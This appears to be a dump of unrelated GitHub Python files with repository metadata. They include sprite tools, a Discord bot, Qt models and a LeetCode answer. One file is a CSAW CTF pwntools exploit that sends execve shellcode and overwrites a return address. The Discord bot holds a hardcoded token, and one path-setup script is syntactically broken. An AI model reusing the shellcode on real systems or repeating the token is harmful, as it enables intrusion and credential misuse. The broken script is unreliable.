        # No cached answer for this prompt index.
        old = default
    if old != "":
        out += " [" + old + "]"
    out += ": "
    resp = raw_input(out)
    if resp == "":
        resp = old
    cur_line += 1
    cur.write(resp+"\n")
    return resp
try:
sheet = sys.argv[1]
print("| Using " + sheet)
except:
sheet = raw_input("| Path to sprite sheet: ")
tile_width = int(sp_input(" Width of tile"))
tile_height = int(sp_input("Height of tile"))
frames = int(sp_input(" Number of frames"))
names = sp_input("List of row names").replace(", ",",")
dirs = names.split(",")
#print ".--------------------------------"
#print("| Opening your sprite sheet...")
im = Image.open(sheet)
pix = im.convert('RGBA')
offsetx = 0
offsety = 0
autobg = to_rgb(pix.getpixel((offsety, offsetx)))
truebg = sp_input("Background color", autobg)
print ".--------------------------------"
print "| I'm going to take " + sheet
print "| make " + str(len(dirs)) + " folders: " + str(dirs)
print "| representing iOS / OS X image sets"
print "| with " + str(frames) + " frames each"
print "| where every frame is " + str(tile_width) + "x" + str(tile_height)
print "| and remove the background color #" + truebg
print ".--------------------------------"
ans = raw_input("| Is this correct? ")
if not ans.lower() in yeswords:
print("| I'm sorry to hear that :(")
print ".--------------------------------"
exit()
atlas_name = sp_input("Enter image atlas name")
print ".--------------------------------"
aname = atlas_name + ".spriteatlas"
print "| Making " + aname + " directory"
os.mkdir(aname)
#print "| Making " + aname + "/Contents.json"
main_content = {"info": { "version": 1, "author": "Splite" } }
outjson = open(aname + "/Contents.json", "w")
outjson.write(json.dumps(main_content, indent=4, separators=(',', ': ')))
outjson.close()
dcount = 0
for d in dirs:
print "| Processing " + d + ".imageset"
for x in range(1, frames+1):
bname = aname + "/" + atlas_name + "_" + d + "_" + str(x) + ".imageset"
# print "| Creating " + bname + " directory"
os.mkdir(bname)
sub_content = { "images" : [ { "idiom" : "universal", "filename" : "tiles-0.png", "scale" : "1x" }, { "idiom" : "universal", "scale" : "2x" }, { "idiom" : "universal", "scale" : "3x" } ], "info" : { "version" : 1, "author" : "Splite" } }
# print "| Creating " + bname + "/Contents.json"
outjson = open(bname + "/Contents.json", "w")
outjson.write(json.dumps(sub_content, indent=4, separators=(',', ': ')))
outjson.close()
# print "| Processing " + d + ".imageset: " + str(tile_width) + "x" + str(tile_height) + " frame #" + str(x)
top = dcount*tile_height
left = x*tile_width
bottom = top + tile_height
right = left + tile_width
nim = im.crop((left, top, right, bottom))
npix = nim.load()
for zy in range(0, tile_height):
for zx in range(0, tile_width):
if to_rgb(npix[zy, zx]) == truebg:
# make transparent
npix[zy, zx] = (255, 255, 255, 0)
nim.save(bname + "/tiles-0.png")
dcount += 1
print ".--=============--=============--."
print "| All Done!! |"
print ".--=============--=============--."
| UTF-8 | Python | false | false | 4,015 | py | 1 | splite.py | 1 | 0.539726 | 0.532254 | 0 | 153 | 25.24183 | 239 |
Vivenkko/Python | 11,605,001,648,730 | f70d26240212a2abf8b5c12f543496c6aa280ce9 | f613067c07773785551f1daecb1ae4727cda83a3 | /Ejercicios/Ticket de Compra/ticket.py | b12c2210716a5ca282b1daa579e605f7746a51ec | [] | no_license | https://github.com/Vivenkko/Python | e37510ea66d07fcfbfdd9ced63dc351aad40e535 | 0a908ab389875480b23b30e68ff353fbe6a377c7 | refs/heads/master | "2021-05-07T18:37:17.014265" | "2018-02-20T12:42:18" | "2018-02-20T12:42:18" | 108,816,674 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import producto
import alimentacion
import electronica
import ropa
listaProductos = [
alimentacion('ES-SE-22314','cebolla',0.14,'11/11/2017'),
alimentacion('ES-JA-23623','botella de vino',11.55,'01/01/2038'),
alimentacion('ES-CO-12352','chuleta de cerdo',0.90,'10/11/2017'),
alimentacion('SU-SC-23145','tableta de chocolate',1.15,'10/02/2018'),
alimentacion('ES-VI-54324','queso curado de cabra',13.30,'20/0/2018'),
ropa('CH-YG-92114','vaqueros negros',19.95,'38'),
ropa('CH-BE-54628','camiseta joker',9.95,'M'),
ropa('CH-HK-13597','deportes Fila',29.95,'43'),
ropa('CH-YZ-95371','colgante Mjölnir',2.50,'12'),
ropa('CH-GH-53928','tirantes negros',11.25,'M'),
electronica('US-CA-52417','iPhone X',1350.00,'1 año'),
electronica('US-CO-74125','portátil Mountain',2150.00,'2 años'),
electronica('US-MI-95682','lcd samsung s8',250.00,'6 meses'),
electronica('US-CH-12456','microSD 1 TB',100.00,'1 año'),
electronica('US-TX-65236','usb cafetera',50.00,'8 meses')
]
print listaProductos
| UTF-8 | Python | false | false | 1,072 | py | 20 | ticket.py | 20 | 0.655108 | 0.477976 | 0 | 25 | 41.68 | 74 |
KaioAntonio/CPTBot | 6,768,868,498,737 | f1c5be6fe2d29fc0932da2f0c2bb368834a1968d | 65296a1e4dbcb71011268ea6d0a926046073cf4e | /main.py | cf8c24accd77865dd65a9e1a62738174e4aaa42c | [] | no_license | https://github.com/KaioAntonio/CPTBot | d37c0b74e926ed0d92246dd46baa928395d4b53d | 76515429ea4d52184e2408d2af94b80dd83d4b86 | refs/heads/master | "2023-08-24T19:47:19.944413" | "2021-10-17T03:02:54" | "2021-10-17T03:02:54" | 417,991,973 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import discord
client = discord.Client()
@client.event
async def on_ready():
print("O BOT ESTÁ ONLINE")
@client.event
async def on_message(message):
content = message.content.lower()
channel = message.channel
author = message.author.name
mention = message.author.mention
if(author == "CPTbot"):
return
if(content == "!play" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("ENVIE SOMENTE NO CHAT DE MUSICA " + mention)
if (content == "bom dia" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("bom dia " + mention)
if (content == "boa tarde" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("boa tarde " + mention)
if (content == "boa noite" and channel.name == "⭐𝐂𝐇𝐀𝐓"):
await channel.send("boa noite " + mention)
client.run("ODk1MDYyNjM0OTk3NjE2NjYx.YVzGCQ.Yfi18iHdIKAHwV7A68lyN2we188")
| UTF-8 | Python | false | false | 938 | py | 2 | main.py | 1 | 0.645857 | 0.631101 | 0 | 31 | 27.322581 | 73 |
duraes-antonio/ResolveAE | 6,124,623,406,390 | 396983d799dae77c90cb863d191d9cb9c7396a31 | 81ac288bce5543a1760069644f89669334de1456 | /Persistencia/Scripts/micro_dao/estado.py | 812b61fd23a94364e70063fabe857cf2c497157b | [] | no_license | https://github.com/duraes-antonio/ResolveAE | 52bdcc77785ca9789614488eae0e6ae2dbd04d55 | a256346dedfcdcd972a3177c4a07896fbe4eb802 | refs/heads/master | "2020-03-26T20:44:02.577208" | "2018-12-05T23:32:41" | "2018-12-05T23:32:41" | 145,342,257 | 0 | 0 | null | false | "2018-12-02T19:42:30" | "2018-08-19T22:34:42" | "2018-12-02T13:17:52" | "2018-12-02T19:42:29" | 78,929 | 0 | 0 | 0 | Java | false | null | from micro_dao.objeto_modelo import ObjetoModelo
class Estado(ObjetoModelo):
    """Model object for a state: full name plus its abbreviation (sigla)."""
    # Backing fields; accessed through the getter/setter pairs below.
    _id: int
    _nome: str
    _sigla: str
    def __init__(self, nome_estado: str, sigla: str):
        # NOTE(review): the id is hard-coded to 1 here; presumably the DAO
        # layer assigns the real id on persistence -- confirm.
        self._id = 1
        self.set_nome(nome_estado)
        self.set_sigla(sigla)
    def get_id(self) -> int:
        """Return the state's id."""
        return self._id
    def set_id(self, id: int):
        """Set the state's id; returns self for call chaining."""
        self._id = id
        return self
    def get_nome(self) -> str:
        """Return the state's full name."""
        return self._nome
    def set_nome(self, nome_estado: str):
        """Set the state's full name; returns self for call chaining."""
        self._nome = nome_estado
        return self
    def get_sigla(self) -> str:
        """Return the state's abbreviation (sigla)."""
        return self._sigla
    def set_sigla(self, sigla: str):
        """Set the state's abbreviation; returns self for call chaining."""
        self._sigla = sigla
        return self | UTF-8 | Python | false | false | 691 | py | 178 | estado.py | 153 | 0.564399 | 0.562952 | 0 | 33 | 19.969697 | 53
pracedru/PracedruDesign | 481,036,357,434 | d256727c26decbeef8a5b3564100a11f544ffbf5 | f3e2ac6d8b1a119233a453d3e96207cdb1b12cd6 | /GUI/Models/MarginsModel.py | 383b3488204a1c66beb20a743c92c41eb80d18dd | [
"BSD-3-Clause"
] | permissive | https://github.com/pracedru/PracedruDesign | 017071f75ee3aabe5832828f3f4d095ee7488841 | e6e313ee3efb377a8e393e5276eb9daa172e1c58 | refs/heads/master | "2021-01-20T00:10:36.038890" | "2019-03-11T09:21:55" | "2019-03-11T09:21:55" | 89,090,104 | 4 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from PyQt5.QtCore import *
from Business import *
__author__ = 'mamj'
# Column titles for the single-column margins table (used by MarginsModel).
col_header = ["Margin Name"]
class MarginsModel(QAbstractTableModel):
    """Qt table model exposing a document's margins: one row per margin and
    a single editable "Margin Name" column."""

    def __init__(self, doc):
        # Fix: initialize the actual base class. The original called
        # QAbstractItemModel.__init__ directly even though this class
        # derives from QAbstractTableModel; super() keeps them in sync.
        super().__init__()
        self._margins = doc.get_margins()
        self._doc = doc
        # Refresh attached views whenever the margins collection changes.
        self._margins.add_change_handler(self.on_margins_changed)

    def rowCount(self, model_index=None, *args, **kwargs):
        """One row per margin in the document."""
        return len(self._margins.get_margins())

    def columnCount(self, model_index=None, *args, **kwargs):
        """Single "Margin Name" column (see col_header)."""
        return len(col_header)

    def data(self, model_index: QModelIndex, int_role=None):
        """Return the margin name for display/edit roles; None otherwise."""
        row = model_index.row()
        col = model_index.column()
        # Display and edit both show the plain name, so share one branch.
        if col == 0 and int_role in (Qt.DisplayRole, Qt.EditRole):
            return self._margins.get_margins()[row].name
        return None

    def setData(self, model_index: QModelIndex, value: QVariant, int_role=None):
        """Rename the margin at *model_index*; only column 0 is editable."""
        row = model_index.row()
        if model_index.column() == 0:
            self._margins.get_margins()[row].set_name(value)
            return True
        return False

    def remove_rows(self, rows):
        """Delete the margins shown at the given row indices."""
        margins = {self._margins.get_margins()[row] for row in rows}
        remove_margins(self._doc, margins)

    def on_margins_changed(self, event: ChangeEvent):
        """Change handler: notify attached views that the layout changed."""
        self.layoutChanged.emit()

    def flags(self, model_index: QModelIndex):
        """Every cell is selectable, enabled and editable."""
        return Qt.ItemIsSelectable | Qt.ItemIsEnabled | Qt.ItemIsEditable

    def headerData(self, p_int, orientation, int_role=None):
        """Row numbers on the vertical header, column titles on top."""
        if int_role == Qt.DisplayRole:
            if orientation == Qt.Vertical:
                return p_int
            return col_header[p_int]
        return None

    def get_margins_object(self):
        """Return the underlying margins collection."""
        return self._margins

    def get_margin(self, row):
        """Return the margin shown at *row*."""
        return self._margins.get_margins()[row]

    def get_index_from_margin(self, component):
        """Return the column-0 model index for margin *component*."""
        row = self._margins.get_margins().index(component)
        return self.index(row, 0)
| UTF-8 | Python | false | false | 1,990 | py | 118 | MarginsModel.py | 106 | 0.68995 | 0.687437 | 0 | 76 | 25.184211 | 77 |
aman589/2018-ctfs-chall-and-sol | 9,500,467,666,023 | bb9cd0a3fd44d6552bfd7c6609fab13abe726483 | 00691c1f887c2dc2f85d90440368e596e32b307a | /csaw18/shellcode/sol.py | f386e9cba7b0e3ca38b61e75ce95eff536f5c89d | [] | no_license | https://github.com/aman589/2018-ctfs-chall-and-sol | d11cad09447dc55062747d667b5f1393faa65bcf | 888d79243155085523899267c594028fb4208b34 | refs/heads/master | "2020-08-09T22:30:21.067835" | "2019-10-10T13:52:55" | "2019-10-10T13:52:55" | 214,190,696 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from pwn import *
import codecs  # NOTE(review): imported but never used in this script
# Exploit script (pwntools): send two shellcode halves, read a leaked stack
# address, then overwrite the saved return address to jump into them.
#p = process('./shellpointcode')
elf = ELF('./shellpointcode')  # load target binary metadata (not used below)
offset = 11  # padding bytes before the saved return address (see payload)
# Earlier shellcode attempt, kept for reference:
# shellcode2 = "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
# shellcode1 = "\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
# Two raw x86-64 machine-code fragments; stage 2 ends in "\xeb\x12", a short
# relative jmp -- presumably chaining into the other half on the stack.
shellcode1 = "\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
shellcode2 = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"+"\xeb\x12"
p = remote('pwn.chal.csaw.io' ,9005)  # live challenge server
p.recvuntil('1:')  # prompt for the first shellcode half
p.sendline(shellcode1)
p.recvuntil('2:')  # prompt for the second half
p.sendline(shellcode2)
p.recvuntil('node.next: ')  # the binary prints a stack pointer; parse it
leak = int(p.recvline(False), 16)
payload = "A"*11  # NOTE(review): duplicates `offset` above -- keep in sync
payload += p64(leak+8)  # return into the leaked stack location (+8)
print(payload)  # debug output of the payload being sent
#payload += shellcode
p.sendline(payload)
p.recv()
p.interactive()  # hand the (hopefully) spawned shell to the user
| UTF-8 | Python | false | false | 723 | py | 260 | sol.py | 176 | 0.695712 | 0.550484 | 0.081604 | 28 | 24.785714 | 77 |
fmpr/edward | 17,265,768,565,315 | 5aea2d1bc8f8bc4de2268d053a0a05d6fb2ba880 | c292eda0a47d00d5a6a63b401fe52fe48adc3778 | /examples/bayesian_linear_regression.py | 124ed9546ce739c8c2e4b50314e8b56a7d09db31 | [
"Apache-2.0"
] | permissive | https://github.com/fmpr/edward | 6a30636ffb1e903a975b2a60065bf863a565a3cd | dc8869fa96a3294ae0bc6223ff6b613218e105ef | refs/heads/master | "2021-01-17T20:12:58.270383" | "2016-08-05T20:04:09" | "2016-08-05T20:05:59" | 65,051,346 | 1 | 0 | null | true | "2016-08-05T21:52:31" | "2016-08-05T21:52:31" | "2016-08-05T05:50:19" | "2016-08-05T20:08:10" | 18,971 | 0 | 0 | 0 | null | null | null | #!/usr/bin/env python
"""
Bayesian linear regression using mean-field variational inference.
Probability model:
Bayesian linear model
Prior: Normal
Likelihood: Normal
Variational model
Likelihood: Mean-field Normal
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import tensorflow as tf
from edward.models import Variational, Normal
from edward.stats import norm
class LinearModel:
"""
Bayesian linear regression for outputs y on inputs x.
p((x,y), z) = Normal(y | x*z, lik_variance) *
Normal(z | 0, prior_variance),
where z are weights, and with known lik_variance and
prior_variance.
Parameters
----------
lik_variance : float, optional
Variance of the normal likelihood; aka noise parameter,
homoscedastic variance, scale parameter.
prior_variance : float, optional
Variance of the normal prior on weights; aka L2
regularization parameter, ridge penalty, scale parameter.
"""
def __init__(self, lik_variance=0.01, prior_variance=0.01):
self.lik_variance = lik_variance
self.prior_variance = prior_variance
self.n_vars = 2
def log_prob(self, xs, zs):
"""Return a vector [log p(xs, zs[1,:]), ..., log p(xs, zs[S,:])]."""
x, y = xs['x'], xs['y']
log_prior = -tf.reduce_sum(zs*zs, 1) / self.prior_variance
# broadcasting to do (x*W) + b (n_minibatch x n_samples - n_samples)
W = tf.expand_dims(zs[:, 0], 0)
b = zs[:, 1]
mus = tf.matmul(x, W) + b
# broadcasting to do mus - y (n_minibatch x n_samples - n_minibatch x 1)
y = tf.expand_dims(y, 1)
log_lik = -tf.reduce_sum(tf.pow(mus - y, 2), 0) / self.lik_variance
return log_lik + log_prior
def build_toy_dataset(N=40, noise_std=0.1):
ed.set_seed(0)
x = np.concatenate([np.linspace(0, 2, num=N/2),
np.linspace(6, 8, num=N/2)])
y = 0.075*x + norm.rvs(0, noise_std, size=N)
x = (x - 4.0) / 4.0
x = x.reshape((N, 1))
return {'x': x, 'y': y}
ed.set_seed(42)
model = LinearModel()
variational = Variational()
variational.add(Normal(model.n_vars))
data = build_toy_dataset()
inference = ed.MFVI(model, variational, data)
inference.run(n_iter=250, n_samples=5, n_print=10)
| UTF-8 | Python | false | false | 2,407 | py | 60 | bayesian_linear_regression.py | 53 | 0.619028 | 0.599501 | 0 | 79 | 29.468354 | 80 |
HanchengZhao/Leetcode-exercise | 18,056,042,523,560 | eb3e22ddcb708db656a75dd0dd61aac3f5cac897 | 4c20c78cf383cd40db8e3d3eee88e5f96884a1af | /486. Predict the Winner/486.predict-the-winner.py | c2ba4d9bf9f3b17a5dbe8322c3a5b8536bec658f | [] | no_license | https://github.com/HanchengZhao/Leetcode-exercise | de6c17a2c965fe0c3afc0a4c39fc0a5f8bbe8d47 | 6c780a97c956856ac94a5d0bb4c9b631e7a0677a | refs/heads/master | "2021-05-04T10:09:29.308858" | "2019-10-17T05:31:20" | "2019-10-17T05:31:20" | 50,731,817 | 7 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #
# @lc app=leetcode id=486 lang=python3
#
# [486] Predict the Winner
#
class Solution:
def PredictTheWinner(self, nums) -> bool:
n = len(nums)
memo = [[0 for _ in range(n)] for _ in range(n)]
prefix = [0 for _ in range(n+1)]
for i in range(n):
prefix[i+1] = nums[i] + prefix[i]
# i, j indicates the start and end
# recursion also returns the max value
def subsum(i, j):
return prefix[j+1] - prefix[i]
def recursion(nums, i, j, memo):
if memo[i][j]:
return memo[i][j]
if i > j:
return 0
if i == j:
return nums[i]
if i == j - 1:
memo[i][j] = max(nums[i], nums[j])
return memo[i][j]
# either get first or the last
memo[i][j] = max(subsum(i+1, j) -
recursion(nums, i+1, j, memo) + nums[i],
subsum(i, j-1) - recursion(nums, i, j-1, memo) + nums[j])
return memo[i][j]
total = prefix[n]
first_max = recursion(nums, 0, n-1, memo)
return first_max >= total - first_max
# s = Solution()
# s.PredictTheWinner([1, 5, 233, 7])
| UTF-8 | Python | false | false | 1,259 | py | 611 | 486.predict-the-winner.py | 608 | 0.461477 | 0.440826 | 0 | 42 | 28.97619 | 86 |
LuaDist/xlsxwriter | 2,224,793,062,732 | 00ceca90e0eb4b32fbcd3d847d50cb163a1475be | a2966ab1f86668ecf3378bbe934af8fa553e83fc | /test/comparison/test_hyperlinks.py | 25253e30f956d2b65cae12f7459b96c14097ee8e | [
"MIT"
] | permissive | https://github.com/LuaDist/xlsxwriter | b332f745cf4258d77c2efcad62a2949c4f00cb9d | 21542b5d672f97ae69e0d36164bd7f67b1c532cd | refs/heads/master | "2023-06-04T14:32:08.206327" | "2014-11-01T11:16:38" | "2014-11-01T11:16:38" | 18,325,666 | 2 | 1 | null | true | "2014-11-01T11:16:39" | "2014-04-01T10:25:48" | "2014-10-08T12:12:12" | "2014-11-01T11:16:38" | 7,447 | 1 | 0 | 0 | Lua | null | null | ###############################################################################
#
# Test cases for xlsxwriter.lua.
#
# Copyright (c), 2014, John McNamara, jmcnamara@cpan.org
#
import base_test_class
class TestCompareXLSXFiles(base_test_class.XLSXBaseTest):
"""
Test file created with xlsxwriter.lua against a file created by Excel.
Tests for hyperlinks in files.
"""
def test_hyperlink01(self):
self.run_lua_test('test_hyperlink01')
def test_hyperlink02(self):
self.run_lua_test('test_hyperlink02')
def test_hyperlink03(self):
self.run_lua_test('test_hyperlink03')
def test_hyperlink04(self):
self.run_lua_test('test_hyperlink04')
def test_hyperlink05(self):
self.run_lua_test('test_hyperlink05')
def test_hyperlink06(self):
self.run_lua_test('test_hyperlink06')
def test_hyperlink07(self):
self.run_lua_test('test_hyperlink07')
def test_hyperlink08(self):
self.run_lua_test('test_hyperlink08')
def test_hyperlink09(self):
self.run_lua_test('test_hyperlink09')
def test_hyperlink10(self):
self.run_lua_test('test_hyperlink10')
def test_hyperlink11(self):
self.run_lua_test('test_hyperlink11')
def test_hyperlink12(self):
self.run_lua_test('test_hyperlink12')
def test_hyperlink13(self):
self.run_lua_test('test_hyperlink13')
def test_hyperlink14(self):
self.run_lua_test('test_hyperlink14')
def test_hyperlink15(self):
self.run_lua_test('test_hyperlink15')
def test_hyperlink16(self):
self.run_lua_test('test_hyperlink16')
def test_hyperlink17(self):
self.run_lua_test('test_hyperlink17')
def test_hyperlink18(self):
self.run_lua_test('test_hyperlink18')
def test_hyperlink19(self):
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.run_lua_test('test_hyperlink19')
def test_hyperlink20(self):
self.run_lua_test('test_hyperlink20')
| UTF-8 | Python | false | false | 2,069 | py | 152 | test_hyperlinks.py | 16 | 0.630256 | 0.589657 | 0 | 77 | 25.87013 | 101 |
seijiotsu/pavsca | 10,591,389,397,186 | f534818dd6979596c94baba3e249d4c828c03cc3 | f3a428006f21af3eb19d30620e9aaa3df241be10 | /pavsca/phonology/word.py | 28607d2425f704358c67aaaf690c2135918f8e14 | [
"MIT"
] | permissive | https://github.com/seijiotsu/pavsca | 7faf4ad7ad9dc37d332f76821825cd8238bd385a | f29cf99c4e360fb38037a66cb46b8959df4b06d4 | refs/heads/main | "2023-08-14T18:22:37.262118" | "2021-10-12T18:05:30" | "2021-10-12T18:05:30" | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from typing import List
from enum import Enum
class Stress(Enum):
Stressed = 0
Unstressed = 1
Any = 2
class Word:
def __init__(self, word: str):
"""
Takes a string such as "ak.mak" as input, and parses it
into a Word.
Currently handles the following phonemes:
- basic phonemes (e.g. p, t, k)
- aspiration (ʰ)
Currently handles manually specified syllables and syllable stress.
"""
temp = []
curr_syllable = 0
syllable = []
self.stressed_syllable = 0 # default, override if we find "'" or "ˈ" later on.
for c in word:
# Edge case: syllable marker. Increment curr_syllable
if c == '.':
curr_syllable += 1
continue
elif c == '\'' or c == "ˈ":
# This is a stressed syllable marker. The next syllable is the stressed one.
curr_syllable += 1
self.stressed_syllable = curr_syllable
continue
# Normal case: this is some sort of phoneme component.
if c == 'ʰ':
# This isn't a standalone phoneme, append to the previous
# phoneme.
temp[-1] += c
else:
# This is a standalone phoneme, add to temp.
temp.append(c)
# Add to the current syllable.
syllable.append(curr_syllable)
self.phonemes = temp
self.syllable = syllable
def get_syllables_as_list(self) -> List[List[str]]:
"""
For a word like "pac.man" we will return [['p', 'a', 'c'], ['m', 'a', n']]
"""
buckets = [[] for x in range(self.syllable[-1] + 1)]
for i, phoneme in enumerate(self.phonemes):
buckets[self.syllable[i]].append(phoneme)
return buckets
def get_stress_at_index(self, index: int) -> Stress:
if self.syllable[index] == self.stressed_syllable:
return Stress.Stressed
else:
return Stress.Unstressed
def __repr__(self) -> str:
return ''.join(self.phonemes) | UTF-8 | Python | false | false | 2,160 | py | 7 | word.py | 4 | 0.526438 | 0.5218 | 0 | 65 | 32.184615 | 92 |
minhle92/rage | 13,726,715,495,452 | 3e474251c4deae33f223f8b0156ac152db1681d0 | 6669ef2c1d54095799d69d3c4417d4ad79cd6c2c | /pathhelp.py | bdcc3f28d0200bb9a305382b066d6811111a230c | [] | no_license | https://github.com/minhle92/rage | 8fdd076986ddb4883be831fd5b58dbc1743a177a | ffbe8d62ac67c43646004f80d9e223d6405d2ed8 | refs/heads/master | "2020-06-04T21:59:49.374263" | "2014-05-20T01:06:40" | "2014-05-20T01:06:40" | 19,923,836 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import subprocess
import sys
def pathhelp(folder=None, profile_dir=None):
    """Append `export PATH=...` lines for the bundled tools to .bash_profile.

    folder:      installation directory of this package; prompted for
                 interactively when None (original behaviour).
    profile_dir: directory containing the user's .bash_profile; prompted
                 for interactively when None.

    Entries already present in the profile are not appended again.
    """
    if folder is None:
        # raw_input is Python 2; this script predates Python 3.
        folder = raw_input('Please input full path for where you put our folder:')
    if folder[-1] != "/":
        folder = folder + "/"
    prefix = "export PATH=$PATH:/"
    tool_dirs = ["tools/cutadapt-1.4.2/bin",
                 "tools/glimmer3.02/bin",
                 "tools/cufflinks-2.2.0.Linux_x86_64 2",
                 "tools/cem/bin",
                 "tools/bowtie-1.0.1",
                 "tools/samtools-0.1.19"]
    if profile_dir is None:
        profile_dir = raw_input("\nPlease enter the path for your system's bash_profile file:")
    if profile_dir[-1] != "/":
        profile_dir = profile_dir + "/"
    fo = open(profile_dir + ".bash_profile", "a+")
    # "a+" read position is implementation-dependent; seek explicitly and
    # snapshot the contents once (the original called readlines() inside the
    # loop, which returned [] after the first call, so dedup never worked).
    fo.seek(0)
    existing = fo.read()
    for item in tool_dirs:
        entry = prefix + folder + item
        if entry not in existing:
            # Write directly instead of the original (syntactically broken)
            # subprocess.call(["echo", ...]) -- list-form subprocess performs
            # no shell ">>" redirection anyway.
            fo.write(entry + "\n")
    fo.close()
# Script-style entry point: runs interactively as soon as the module executes.
pathhelp()
| UTF-8 | Python | false | false | 734 | py | 8 | pathhelp.py | 7 | 0.576294 | 0.538147 | 0 | 22 | 32.363636 | 164 |
linuxmint/mint-common | 12,816,182,442,261 | da0120f68ad79d0ccdf16058a605fb0ebbd329a1 | b40c7cf7ca3b1d8327a19bfa47b3a19c0632bc87 | /usr/lib/python3/dist-packages/mintcommon/additionalfiles.py | 8ab213a7db2b78f837f82e06501fd7d575471ec5 | [] | no_license | https://github.com/linuxmint/mint-common | 3cc0251f706d75eb58a5be48f25486ac1162ec5a | c1620d4b57a201abe0679b4a8cbc36e59c3d8728 | refs/heads/master | "2020-04-16T00:20:29.060184" | "2020-04-14T20:49:15" | "2020-04-14T20:49:15" | 329,947 | 3 | 15 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import os
import gettext
def strip_split_and_recombine(comma_separated):
word_list = comma_separated.split(",")
out = ""
for item in word_list:
out += item.strip()
out+=";"
return out
def generate(domain, path, filename, prefix, name, comment, suffix, genericName=None, keywords=None, append=False):
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
if append:
desktopFile = open(filename, "a")
else:
desktopFile = open(filename, "w")
desktopFile.writelines(prefix)
desktopFile.writelines("Name=%s\n" % name)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(name) != name):
desktopFile.writelines("Name[%s]=%s\n" % (directory, _(name)))
except:
pass
if comment is not None:
desktopFile.writelines("Comment=%s\n" % comment)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(comment) != comment):
desktopFile.writelines("Comment[%s]=%s\n" % (directory, _(comment)))
except:
pass
if keywords is not None:
formatted = strip_split_and_recombine(keywords)
desktopFile.writelines("Keywords=%s\n" % formatted)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(keywords) != keywords):
translated = strip_split_and_recombine(_(keywords))
desktopFile.writelines("Keywords[%s]=%s\n" % (directory, translated))
except:
pass
if genericName is not None:
desktopFile.writelines("GenericName=%s\n" % genericName)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(genericName) != genericName):
desktopFile.writelines("GenericName[%s]=%s\n" % (directory, _(genericName)))
except:
pass
desktopFile.writelines(suffix)
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
def generate_polkit_policy(domain, path, filename, prefix, message, suffix, append=False):
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path)
if append:
desktopFile = open(filename, "a")
else:
desktopFile = open(filename, "w")
desktopFile.writelines(prefix)
desktopFile.writelines("<message>%s</message>\n" % message)
for directory in sorted(os.listdir(path)):
mo_file = os.path.join(path, directory, "LC_MESSAGES", "%s.mo" % domain)
if os.path.exists(mo_file):
try:
language = gettext.translation(domain, path, languages=[directory])
language.install()
if (_(message) != message):
desktopFile.writelines("<message xml:lang=\"%s\">%s</message>\n" % (directory, _(message)))
except:
pass
desktopFile.writelines(suffix)
os.environ['LANGUAGE'] = "en_US.UTF-8"
gettext.install(domain, path) | UTF-8 | Python | false | false | 4,155 | py | 18 | additionalfiles.py | 16 | 0.557882 | 0.556679 | 0 | 106 | 38.207547 | 115 |
rogersilveiraa/Python | 858,993,490,805 | 874ca1d689b286a78adcbea2af848e5ddc838402 | fcfc0f847a898125a32ebeeaf8e4bad891b4b67f | /Semana 7/Decomposição em primos.py | e7d303f4ada5fa48be63a8a6406746eb4c40c828 | [] | no_license | https://github.com/rogersilveiraa/Python | 61db5950ec15611b5d321a8b6c04b25a0f6b96ca | 80e2d6482c401f256a9ccc37a14ca913b8965d20 | refs/heads/master | "2021-08-18T08:35:28.750946" | "2021-04-27T14:04:01" | "2021-04-27T14:04:01" | 250,093,498 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | entrada_usuario = 1
fator = 2
while entrada_usuario < 2:
entrada_usuario = int(input("Digite um número natural maior que 1 para saber sua fatoração: \n"))
while entrada_usuario != 1 :
expoente = 0
while (entrada_usuario % fator) == 0:
entrada_usuario /= fator
expoente += 1
if expoente != 0 and entrada_usuario != 1:
print (fator, "^" ,expoente, end = " * ")
if entrada_usuario == 1:
print (fator, "^", expoente)
fator += 1
| UTF-8 | Python | false | false | 511 | py | 30 | Decomposição em primos.py | 30 | 0.566929 | 0.543307 | 0 | 19 | 24.947368 | 101 |
